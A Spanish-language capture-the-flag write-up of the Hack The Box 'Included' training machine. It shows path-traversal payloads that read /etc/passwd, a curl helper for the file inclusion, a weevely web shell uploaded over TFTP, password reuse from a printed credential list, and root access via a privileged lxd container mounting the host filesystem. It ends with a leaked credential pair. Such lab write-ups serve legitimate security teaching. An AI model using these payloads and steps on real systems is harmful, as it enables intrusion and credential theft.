Included
Difficulty : Very Easy
Operating System : Linux
Rating : 5.0
Author : TRX
Description
Otra maquina de la serie "Starting Point" donde nos encontraremos de frente con un LFI que nos permitira obtener un usuario en la maquina para seguir obteniendo privilegios construyendo una imagen lxc vulnerable. Adelante!
Enumeration
Para la enumeracion basica vamos a utilizar una tool que he desarrollado especificamente para trabajar con maquinas en la plataforma hackthebox. Esta herramienta crea la carpeta de trabajo, realiza un escaneo basico con nmap y si encuentra un servicio web le lanza una enumeracion basica.
Descarga: HTBenum
Nmap
Nmap scan report for included.htb (10.10.10.55)
Host is up (0.064s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://included.htb/?file=index.php
Whatweb
http://included.htb [302 Found] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55], RedirectLocation[http://included.htb/index.php?file=index.php]
http://included.htb/index.php?file=index.php [301 Moved Permanently] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55], RedirectLocation[http://included.htb/?file=index.php], Title[301 Moved Permanently]
http://included.htb/?file=index.php [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.55]
HTTP Headers
HTTP/1.1 302 Found
Date: Sat, 07 Aug 2021 14:11:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: http://included.htb/index.php?file=index.php
Content-Length: 3704
Content-Type: text/html; charset=UTF-8
Nikto
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.55
+ Target Hostname: included.htb
+ Target Port: 80
+ Start Time: 2021-08-07 16:06:33 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Root page / redirects to: http://included.htb/index.php?file=index.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7967 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2021-08-07 16:16:24 (GMT2) (591 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
User Own
Lo primero que me llama la atencion de la enumeracion es la direccion http://included.htb/?file=index.php que nos devuelve un [200 OK] . Tiene pintaza de LFI por lo que
me voy a descargar un diccionario con posibles rutas llamado file_inclusion_linux.txt y voy a lanzar la herramienta ffuf a ver que nos devuelve
[root@htb included]# ffuf -w file_inclusion_linux.txt:FUZZ -u "http://included.htb/?file=FUZZ" -fs 3704
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://included.htb/?file=FUZZ
:: Wordlist : FUZZ: file_inclusion_linux.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 3704
________________________________________________
../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../../../etc/hosts [Status: 200, Size: 3927, Words: 274, Lines: 103]
../../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../etc/group [Status: 200, Size: 4397, Words: 253, Lines: 148]
../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
/../../../../../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/passwd [Status: 200, Size: 5279, Words: 262, Lines: 124]
../../../../../../etc/passwd&=%3C%3C%3C%3C [Status: 200, Size: 5279, Words: 262, Lines: 124]
:: Progress: [2247/2247] :: Job [1/1] :: 612 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
Efectivamente podemos leer /etc/passwd
[root@htb included]# curl -s "http://included.htb/?file=../../../../../etc/passwd" | sed 's/<[^>]*>//g'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
Podemos hacernos un pequeño script para trabajar comodamente con los archivos de esta web en concreto filtrando las etiquetas HTML y el texto que no nos interesa
[root@htb included]# cat xplfi.sh
#!/bin/bash
FILE="$1"
curl -s "http://included.htb/?file=../../../../..$FILE" | sed 's/<[^>]*>//g' | sed '/Titan/I,+200 d' | sed '/^ *$/d'
[root@htb included]# ./xplfi.sh "/etc/os-release"
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
Tras enumerar diferentes archivos del sistema, me fijo en el usuario tftp que encontre en /etc/passwd y me encuentro con este articulo sobre como configurarlo en Ubuntu
[root@htb included]# ./xplfi.sh "/etc/default/tftpd-hpa"
# /etc/default/tftpd-hpa
TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/lib/tftpboot"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="-s -l -c"
Sabiendo el puerto UDP (por eso no lo vimos en el nmap) y el directorio de trabajo /var/lib/tftpboot , vamos a usar weevely para
subir una shell e interactuar con el server.
#Generamos la shell con weevely
[root@htb included]# weevely generate lala evil.php
Generated 'evil.php' with password 'lala' of 677 byte size.
#Conectamos al tftp
[root@htb included]# tftp included.htb
tftp> status
Connected to included.htb.
Mode: netascii Verbose: off Tracing: off Literal: off
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
tftp> verbose
Verbose mode on.
tftp> put evil.php
putting evil.php to included.htb:evil.php [netascii]
Sent 687 bytes in -7.1 seconds [-771 bit/s]
tftp>
#Conectamos weevely a la url usando el LFI
[root@htb included]# weevely "http://included.htb/?file=../../../../../var/lib/tftpboot/evil.php" lala
[+] weevely 4.0.1
[+] Target: included.htb
[+] Session: /root/.weevely/sessions/included.htb/_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@included:/var/www/html $
Despues de enumerar indefinidamente decido probar "bruteforce" con las contraseñas obtenidas en las maquinas anteriores, para el usuario mike...
[root@htb included]# cat passwords.txt
741852963
Sheffield19
qwerty789
P_-U9dA6q.B|
P@s5w0rd!postgres
P@s5w0rd!
Password1234!
MEGACORP_4dm1n!!
mc@F1l3ZilL4
M3g4C0rpUs3r!
M3g4c0rp123
www-data@included:/$ su mike
Password: Sheffield19
mike@included:/$ id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)
mike@included:/$
Pues ya somos user mike.. en fin :/
Root Own
Para convertirnos en root desde el usuario mike vamos a aprovechar que formamos parte del grupo lxd para explotar esta vulnerabilidad
mike@included:/tmp$ id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)
Construyendo una imagen vulnerable..
#Instalar go debian
$ nano ~/.bashrc
#añadimos las siguientes lineas al final
export GOPATH=/home/git/go
export GOROOT=/usr/local/src/go
export PATH=${PATH}:$GOROOT/bin:/home/git/go/bin
$ source ~/.bashrc
$ wget $(curl -s https://golang.org/dl/ |grep --color=never -i linux-amd64.tar.gz |head -n1|awk '{print $4}'|sed 's#href="#https://golang.org#g'|sed 's#">##g')
$ tar zxf go*.linux-amd64.tar.gz
$ mv go $GOROOT
$ rm -rf go*.linux-amd64.tar.gz*
# Construimos la imagen con distrobuilder
$ apt install debootstrap rsync gpg squashfs-tools
$ git clone https://github.com/lxc/distrobuilder
$ cd distrobuilder;make
$ wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
$ distrobuilder build-lxd alpine.yaml -o image.release=3.8
# Ahora subimos los siguientes archivos al target
lxd.tar.xz
rootfs.squashfs
# Añadimos la imagen
mike@included:/tmp/lala$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 5a4ea6c6a2c554f3c6c003f7d51490ca08f9b99ecc7d578
mike@included:/tmp/lala$ lxc image list
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
| alpine | 5a4ea6c6a2c5 | no | Alpinelinux 3.8 x86_64 (20210807_1819) | x86_64 | 1.92MB | Aug 7, 2021 at 6:31pm (UTC) |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
| rootimage | 60534e606b2a | no | alpine v3.14 (20210807_11:34) | x86_64 | 3.10MB | Aug 7, 2021 at 3:46pm (UTC) |
+-----------+--------------+--------+----------------------------------------+--------+--------+-----------------------------+
mike@included:/tmp/lala$ lxc init alpine privesc -c security.privileged=true
Creating privesc
mike@included:/tmp/lala$ lxc list
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
| ignite | RUNNING | 10.124.177.74 (eth0) | fd42:eff6:712f:c3a0:216:3eff:fe63:4b0f (eth0) | PERSISTENT | 0 |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
| privesc | STOPPED | | | PERSISTENT | 0 |
+---------+---------+----------------------+-----------------------------------------------+------------+-----------+
mike@included:/tmp/lala$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
mike@included:/tmp/lala$ lxc start privesc
mike@included:/tmp/lala$ lxc exec privesc /bin/sh
~ # cd /mnt/root
/mnt/root # ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swap.img usr vmlinuz.old
/mnt/root # cd root
/mnt/root/root # ls
login.sql root.txt
Con el proceso anterior hemos montado toda la raiz / en un contenedor y ahora podemos leer y escribir en el sistema con permisos de root
EXTRA: el archivo
login.sqlcontiene unas credenciales que posiblemente tengamos que utilizar en la siguiente maquina...
Daniel
>SNDv*2wzLWf